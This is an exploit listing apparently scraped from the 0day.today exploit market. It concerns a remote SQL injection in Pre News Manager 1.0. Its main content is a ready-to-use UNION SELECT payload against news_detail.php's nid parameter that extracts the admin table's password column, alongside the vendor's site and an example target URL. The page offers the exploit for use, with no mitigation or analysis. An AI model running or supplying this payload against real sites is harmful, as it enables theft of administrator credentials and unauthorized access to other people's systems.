[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pre News Manager 1.0 Remote SQL Injection Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1822
Category
web applications
Date add
02-05-2007
Platform
unsorted
=======================================================
Pre News Manager 1.0 Remote SQL Injection Vulnerability
=======================================================



==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================



#  0day.today [2024-11-15]  #